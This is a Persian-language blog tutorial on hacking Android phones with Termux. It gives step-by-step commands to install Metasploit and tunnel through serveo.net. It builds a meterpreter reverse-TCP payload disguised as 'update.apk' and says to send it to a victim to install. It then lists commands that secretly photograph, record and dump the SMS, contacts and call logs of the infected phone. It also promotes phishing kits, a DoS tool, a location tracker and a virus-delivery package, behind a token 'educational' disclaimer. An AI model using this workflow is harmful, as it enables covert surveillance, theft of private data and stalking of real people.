دستگاه های اندرویدی به طور گسترده در سراسر جهان استفاده می شوند. برنامه ها این پلتفرم را توسط میلیون ها کاربر بهتر اجرا می کنند. هکرها برای آسیب رساندن به کاربران و سرقت اطلاعات شخصی، گوشی های هوشمند را هک می کنند. بنابراین، در این مقاله، شما می خواهید یاد بگیرید که چگونه هکرها دستگاه های اندرویدی را هک می کنند و چگونه می توانید هک اندروید را انجام دهید. پس اگر می خواهید هک گوشی با ترموکس را یاد بگیرید با ما همراه باشید.
در این راهنما، اطلاعات کاملی در مورد نحوه هک کردن دستگاه های اندرویدی و نحوه هک کردن گوشی های اندرویدی توسط هکرها گفته شده. همچنین نکاتی در مورد نحوه محافظت از خود در برابر این نوع هک را به شما یاد خواهم داد. در این راهنما، من قصد دارم از ترموکس ( Termux ) استفاده کنم.
همچنین می توانید در مقاله های پیشین درباره ی دیگر روش های هک گوشی از راه دور نیز اطلاعاتی کسب کنید.
توجه: این فقط برای اهداف آموزشی است از آن برای استفاده غیرقانونی استفاده نکنید. اگر هر کسی که از اطلاعات این وب سایت به دلیل نقض قانون سوء استفاده می کند، اتهامات جنایی مطرح شود، تیم Tricky Worlds مسئولیتی نخواهد داشت.
Termux شبیه سازی ترمینال قدرتمند را با مجموعه گسترده بسته های لینوکس ترکیب می کند. دستورات مورد استفاده در برنامه Termux. Termux یک شبیه ساز ترمینال اندروید است. که بدون نیاز به روت یا تنظیمات مورد نیاز کار می کند و دسترسی ترمینال بسیار خوبی به اندروید و هک هر دستگاه اندرویدی دارد.
پس از این، می توانید تلفن هک شده را با استفاده از Metasploit در termux مشاهده کنید.
وضعیت باتری
صندوق ورودی پیامک خوانده شد
ارسال اس ام اس
اطلاعات دستگاه تلفن
نان تست
موتور TTS در اندروید
TTS Speak
تلفن را ویبره کنید
اطلاعات اتصال وای فای
اطلاعات اسکن Wi-Fi
اطلاعات دوربین
عکس دوربین
کلیپ بورد Ge
مجموعه کلیپ بورد
لیست مخاطبین
دانلود فایل با دانلود منیجر اندروید
موقعیت مکانی از طریق GPS، شبکه تلفن همراه یا Wi-Fi
اطلاع
URL را باز کنید
اشتراک گذاری فایل با اکشن های اندروید
اندروید 5.0 و بالاتر
برنامه اندروید Termux. آن را از زیر دانلود کنید.
من نحوه نصب Metasploit را در Termux در زیر به شما نشان خواهم داد. Termux باید اجازه ذخیره سازی خارجی داشته باشد. برای این فقط این دستور را یکباره وارد کنید:
“Termux-setup-storage”
1. اول از همه، Termux را در دستگاه اندرویدی خود نصب کنید، پیوندها در بالا آورده شده است.
2. پس از آن، برنامه را باز کنید و منتظر بمانید تا چند فایل نصب شود.
3. حالا این دستور را وارد کنید.
apt update $ apt upgrade
4. سپس این متن را وارد یا کپی کنید
apt install curl
5. این را وارد یا کپی کنید
curl -LO https://raw.githubusercontent.com/Hax4us /Metasploit_termux/master/metasploit.sh
6. حالا با دادن این دستور اجازه بدهید.
chmod +x metasploit.sh
7. حالا Next، Go With this command.
./metasploit.sh
8. و اکنون صبر کنید تا پردازش و دانلود کامل شود. بسته به سرعت اینترنت می تواند تا 40 دقیقه طول بکشد
9. اکنون فریم ورک Metasploit را با موفقیت نصب کرده اید.
همچنین، نحوه تغییر مک آدرس دستگاه اندروید و ویندوز خود را بخوانید
1. Termux را باز کنید و دستور زیر را تایپ کنید. ssh باز را با موفقیت نصب می کند
pkg install Openssh
2. پس از آن دستور زیر را تایپ کنید تا جلسه شما شروع شود.
ssh -R 80:localhost:3000 serveo.net
3. اکنون جلسه بالاخره شروع شده است.
1. ابتدا دستور زیر را تایپ کنید تا یک اپلیکیشن payload دریافت کنید
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=3000 R > storage/download/update.apk
2. یک دقیقه صبر کنید و برنامه payload را با موفقیت ایجاد کنید.
اکنون مرحله مهم برنامه را برای قربانی یا دوست خود ارسال کنید و آنها را تشویق کنید تا این برنامه را نصب کنند.
1. با وارد کردن این دستور در جلسه جدید فریم ورک Metasploit را در Termux فعال کنید
msfconsole
2. حالا این دستور را یکی یکی تایپ کنید تا هر دستگاه اندرویدی را هک کنید
3. تبریک……شما با موفقیت گوشی را هک کردید!
1. برای مشاهده لیست دستورات قابل استفاده کافیست یک علامت سوال (؟) وارد کنید و اینتر را بزنید یا کلمات زیر را از تصویر زیر تایپ کنید.
بنابراین، شما کنترل دسترسی کامل به موبایل قربانی خود دارید. میتوانید دستور {meterpreter> help} را برای تمام تواناییهای ممکن برای هک کردن، وارد کنید. اما من این کار را برای شما انجام خواهم داد، می توانید از دستورات زیر برای هک کردن هر دستگاه اندرویدی استفاده کنید
همچنین، نحوه هک کردن هر بازی اندروید را با این آخرین برنامه ها بخوانید
اولا،
برای گرفتن عکس از دوربین جلوی گوشی قربانی فقط این دستور را تایپ کنید:
webcam_snap -i 2 -p storage/downloads/Snapshot-F.jpg
ثانیاً
اگر می خواهید به دوربین پشتی گوشی دسترسی داشته باشید به دستور زیر توجه کنید
webcam_snap -i 1 -p storage/downloads/Snapshot-F.jpg
میتوانید گالری یا فایل منیجر خود را (به طور پیشفرض در پوشه دانلود) بررسی کنید تا تصویر گرفته شده توسط تلفن قربانی خود را ببینید.
برای دسترسی به مخاطبین از تلفن قربانی خود فقط این دستور را تایپ کنید:
dump_contacts -o storage/downloads/Contacts.txt
لیستی از مخاطبین در پوشه دانلود شما یعنی Contacts.txt ذخیره می شود.
3. برای دسترسی به پیامک از تلفن قربانی
برای خواندن تمام پیامک ها از تلفن قربانی درست مانند بالا این دستور را تایپ کنید:
dump_sms -o storage/downloads/SMS.txt
همه پیام ها به طور پیش فرض در پوشه دانلودهای شما یعنی SMS.txt ذخیره می شوند
4. واکشی گزارش تماس
برای دریافت جزئیات گزارش تماس تلفن Android قربانی خود
dump_calllog -o storage/downloads/CallLog.txt
تمام جزئیات گزارش تماس به طور پیشفرض در پوشه دانلودهای شما یعنی CallLog.txt ذخیره میشود.
5. استفاده از میکروفون تلفن قربانی
همچنین میتوانید صدا را در تلفن قربانی ضبط کنید و در تلفن خود به آن گوش دهید. فقط این دستور را تایپ کنید:-
record_mic -d 10 -f storage/downloads/Spy-Record.mp3
این دستور به طور پیش فرض 10 ثانیه صدا را ضبط می کند.
شما می توانید مدت زمان ضبط را با جایگزینی 10 با نقطه دلخواه، 20 برای ضبط 20 ثانیه و غیره افزایش دهید.
Metasploit چیزی بیش از یک ابزار Termux است. این مجموعه ای از ابزارهای بهره برداری است. من Metasploit را پایه ای می نامم که می توانید برای ایجاد ابزارهای خود از آن استفاده کنید. این ابزار رایگان یکی از محبوب ترین ابزارهای امنیت اطلاعات است که به شما امکان می دهد آسیب پذیری ها را در پلتفرم های مختلف پیدا کنید. Metasploit از بیش از 200000 کاربر و کارمند پشتیبانی می کند تا به شما کمک کند اطلاعات مورد نیاز خود را دریافت کنید و آسیب پذیری های سیستم خود را شناسایی کنید. این جعبه ابزار هک به شما این امکان را می دهد که حملات هکرها را برای شناسایی آسیب پذیری ها شبیه سازی کنید. Metasploit در تمام پلتفرم های اصلی موجود است. همچنین می توانید Metasploit را در Termux نصب کنید.
Nmap (نقشه شبکه) یک ابزار امنیتی است که برای کشف میزبان ها و سرویس ها در یک شبکه کامپیوتری استفاده می شود و می توان از آن برای ترسیم نقشه شبکه ها و شناسایی هاست ها و دستگاه های متصل به آنها استفاده کرد. این یک ابزار خط فرمان است و برای سیستم عامل های مختلف از جمله اندروید از طریق Termux در دسترس است. می توان از آن برای انجام کارهای مختلفی مانند کشف شبکه، اسکن پورت و تشخیص نسخه و غیره استفاده کرد. با nmap در Termux، کاربران میتوانند شناسایی شبکه و ارزیابیهای امنیتی را بر روی دستگاههای اندرویدی خود انجام دهند که آن را به ابزاری قدرتمند برای مدیران شبکه و متخصصان امنیتی تبدیل میکند.
Wireshark برای Termux نسخه ای از ابزار محبوب تحلیلگر بسته است که برای اجرا در سیستم عامل اندروید از طریق برنامه شبیه ساز ترمینال Termux پورت شده است. این به کاربران اجازه میدهد تا ترافیک شبکه را در دستگاههای اندرویدی خود مانند نسخه دسکتاپ Wireshark ضبط، تجزیه و تحلیل و بررسی کنند. می توان از آن برای عیب یابی شبکه، تجزیه و تحلیل پروتکل، و ارزیابی های امنیتی و سایر وظایف استفاده کرد. با Wireshark در Termux، مدیران شبکه و متخصصان امنیتی می توانند قدرت یک تحلیلگر بسته با امکانات کامل را در دستگاه های تلفن همراه خود داشته باشند و ترافیک شبکه را در حال حرکت تجزیه و تحلیل کنند.
sqlmap یک ابزار خط فرمان منبع باز است که فرآیند شناسایی و بهره برداری از آسیب پذیری های تزریق SQL را خودکار می کند. می توان از آن برای تست نفوذ و ارزیابی های امنیتی برای کشف و بهره برداری از آسیب پذیری های تزریق SQL در برنامه های کاربردی وب استفاده کرد. SQLMap برای Termux نسخه ای از ابزار است که برای اجرا در سیستم عامل اندروید از طریق برنامه شبیه ساز ترمینال Termux پورت شده است. با SQLMap در Termux، متخصصان امنیتی و تسترهای نفوذ میتوانند حملات تزریق SQL را انجام دهند و دادههای حساس را از پایگاههای داده در دستگاههای تلفن همراه خود استخراج کنند.
جعبه ابزار مهندسی اجتماعی (SET) چارچوبی برای ساخت و اجرای حملات مهندسی اجتماعی است. این ابزاری است که می تواند توسط آزمایش کنندگان نفوذ و محققان امنیتی برای ارزیابی امنیت عنصر انسانی یک سازمان، که به عنوان کاربران نهایی آن نیز شناخته می شود، مورد استفاده قرار گیرد. SET for Termux نسخه ای از ابزار است که برای اجرا در سیستم عامل اندروید از طریق برنامه شبیه ساز ترمینال Termux پورت شده است. با SET در Termux، متخصصان امنیتی و آزمایشکنندگان نفوذ میتوانند حملات مهندسی اجتماعی مختلفی مانند فیشینگ و ارسال انبوه را در دستگاههای تلفن همراه خود انجام دهند.
Nikto یک اسکنر وب سرور منبع باز است که هک گوشی با ترموکس را ساده تر می کند. که می تواند برای شناسایی آسیب پذیری ها در وب سرورها و برنامه های کاربردی وب استفاده شود. می توان از آن برای انجام کارهای مختلفی مانند بررسی نسخه های نرم افزار قدیمی، جستجوی آسیب پذیری های شناخته شده و شناسایی فایل ها و اسکریپت های پیش فرض استفاده کرد.
Nikto for Termux نسخه ای از ابزاری است که برای اجرا در سیستم عامل اندروید از طریق اپلیکیشن شبیه ساز ترمینال Termux پورت شده است. با Nikto در Termux، متخصصان امنیتی و آزمایشکنندگان نفوذ میتوانند ارزیابیهای آسیبپذیری وب سرور و برنامههای وب را بر روی دستگاههای تلفن همراه خود انجام دهند، که آن را به ابزاری قدرتمند برای تست امنیت و تست نفوذ در حال حرکت تبدیل میکند.
Tool-X یکی از بهترین ابزارهای هک است که مخصوص Termux طراحی شده است. با کمک Tool-X می توانید به راحتی و تنها با یک کلیک بیش از 371 ابزار هک را برای Termux نصب کنید. قبل از اختراع این ابزار، باید ابزارهای لازم هک Termux را یکی یکی با جستجو در GitHub یا وب سایت دیگری نصب کنیم. اکنون فقط باید یک ابزار به نام Tool-X را نصب کنید. این ابزار فهرستی از تمام ابزارهای لازم هک Termux را دارد. پس از نصب Tool-X در Termux خود، می توانید به راحتی ابزارهای هک مورد علاقه خود را تنها با یک کلیک نصب کنید.
Fsociety یک ابزار هک برای کاربران Termux در اندروید است. این مجموعه ای از تست های نفوذ، ابزارهای بهره برداری و اسکریپت های مختلف است که می تواند برای اهداف هک اخلاقی استفاده شود. مجموعه ای از ابزارها را برای جمع آوری اطلاعات، اسکن آسیب پذیری، تست بی سیم، تست استرس، شکستن رمز عبور و غیره فراهم می کند.
این به کاربران Termux اجازه می دهد تا شبکه ها، وب سایت ها و شبکه های بی سیم را آزمایش کنند و حملات سایبری را به شیوه ای اخلاقی شبیه سازی کنند. این ابزار به صورت دوره ای با ویژگی ها و ابزارهای جدید توسط توسعه دهندگان به روز می شود. جعبه ابزار Fsociety شامل تمام ابزارهای هک Termux است که در سری Mr.Robot ظاهر شدند.
Hydra ابزاری برای شکستن رمز عبور است که می تواند برای انجام کارهای مختلف مانند حملات آنلاین رمز عبور به پروتکل های مختلف استفاده شود. این یک ابزار خط فرمان است و از پروتکل های مختلفی مانند ftp، telnet، pop3، http، smb، smtp و غیره پشتیبانی می کند. Hydra for Termux نسخه ای از ابزار است که برای اجرا در سیستم عامل اندروید از طریق ترمینال Termux پورت شده است. برنامه شبیه ساز با Hydra در Termux، متخصصان امنیتی و آزمایشکنندگان نفوذ میتوانند حملات شکستن رمز عبور آنلاین را بر روی دستگاههای تلفن همراه خود انجام دهند، که آن را به ابزاری قدرتمند برای تست امنیت و تست نفوذ در حال حرکت تبدیل میکند.
Slowloris یک برنامه هک Dos با پهنای باند کم است. این ابزار با استفاده از زبان برنامه نویسی پایتون برنامه ریزی شده است. یک حمله HTTP Denial of Service را انجام می دهد که سرعت سرورهای کوچک را کند یا خراب می کند. همچنین می توانید از این ابزار برای انجام حمله Dos در وب سایت استفاده کنید. این ابزار درخواست های HTTP زیادی ایجاد می کند و هدرها را به صورت دوره ای برای باز نگه داشتن اتصال ارسال می کند. این ابزار هرگز اتصال را نمی بندد مگر اینکه سرور این کار را انجام دهد. همانطور که سرور اتصال را می بندد، Slowloris یک اتصال جدید به سرور ایجاد کرد. در نتیجه سرور از کار می افتد یا پاسخ نمی دهد.
Zphisher یکی از بهترین ابزارهای هک برای Termux است. اگر به دنبال ابزار Termux هستید که برای فیشینگ محبوب باشد، Zphisher می تواند بهترین ابزار برای شما باشد. این یک نسخه پیشرفته از کیت ابزار فیشینگ و یک نسخه ارتقا یافته از Shell Phish است. در داخل Zphisher، گزینه تونل زنی را از 4 ابزار Ngrok، Localhost، Serveo.net و HTTP://localhost.run دریافت خواهید کرد. Zphisher دارای بیش از 30 صفحه فیشینگ در رسانه های اجتماعی است و هر صفحه در شرایط کار قرار دارد.
اگر به دنبال ابزار Termux هستید که بتواند آدرس IP قربانی را ردیابی کند. IP tracer بهترین ابزار Termux برای شما خواهد بود. IP Tracer از IP-API برای ردیابی آدرس IP کاربر استفاده می کند. هزاران کاربر Termux از این ابزار استفاده می کنند. IP Tracer برای Termux در دسترس است، بنابراین شما به راحتی می توانید IP هر کسی را با استفاده از این ابزار Termux ردیابی کنید. حال بیایید ببینیم چگونه این ابزار را در Termux خود نصب کنیم.
EasY_HaCk یکی از بهترین ابزارها برای Termux است. این ابزاری برای اسکن شبکه، جمع آوری اطلاعات و بهره برداری از تلفن های اندرویدی و رایانه های شخصی ویندوز است. این ابزار عمدتاً برای اهداف تست نفوذ است. این شامل ابزارهای محبوبی مانند Metasploit Framework، SQLmap، nmap، Metagoofil، RED HAWK، recon-ng و ابزارهای تست قدرتمندتر است. در ابتدا، میتوانید از این ابزار برای انجام کارهایی مانند Payload Generation، Metasploit-Framework، نصب Beef-Framework، نصب NGROK و غیره استفاده کنید.
جستجوگر ابزاری است که برای یافتن مکان دقیق شخص از راه دور استفاده می شود. Seeker به شما اجازه می دهد تا یک وب سایت را روی یک سرور PHP میزبانی کنید. از Serveo.net یا Ngrok برای ایجاد پیوند استفاده می کند. می توانید لینک تولید شده را به هدف ارسال کنید. همانطور که هدف وب سایت را باز می کند، اجازه مکان را می خواهد و اگر هدف اجازه دهد. میتوانیم مکان دقیق هدف را همراه با جهت در نقشههای گوگل به دست آوریم. برای اطلاع از مکان دقیق شخص می توانید از Seeker در Termux استفاده کنید. حال بیایید ببینیم که چگونه این ابزار را روی Termux نصب کنیم.
Infect یک بسته Termux است که به شما امکان ایجاد و ارسال ویروس به هر دستگاه اندرویدی را می دهد. از طریق لینک می توانید ویروس ها را تحویل دهید. همچنین می توانید با انتخاب گزینه “save now” در Termux خود، یک دستگاه اندرویدی آلوده را از ویروس ها نجات دهید.
فقط برنامه ها و نرم افزارها را از فروشگاه google play نصب کنید.
مطمئن شوید که مجبور نیستید نصب از منابع ناشناس را فعال کنید.
گوشی خود را همیشه همراه خود داشته باشید.
از باز کردن پیوندهای مشکوک در ایمیل ها یا پیام ها خودداری کنید زیرا می تواند هر دستگاه اندرویدی را هک کند.
بنابراین، در این مقاله، من تمام روش ها و اطلاعاتی را که شما در جستجوی آن هستید برای هک گوش با ترموکس آورده شده. اگر در مورد این مقاله سؤالی دارید، هر گونه بازخورد یا ایده ای دارید اگر می خواهید نظرات خود را به اشتراک بگذارید. دقت داشته باشید که هک گوشی با ترموکس به شما کمک می کند که راحت به اطلاعات دسترسی داشته باشید. اما باید بدانید که این مسئله غیر قانونی است. به هیچ عنوان حتی برای شوخی کردن با افراد نباید این کار را انجام دهید. هک کردن در ایران فقط برای فرزندان زیر 18 سال شما غیر قانونی تلقی نمی شود!.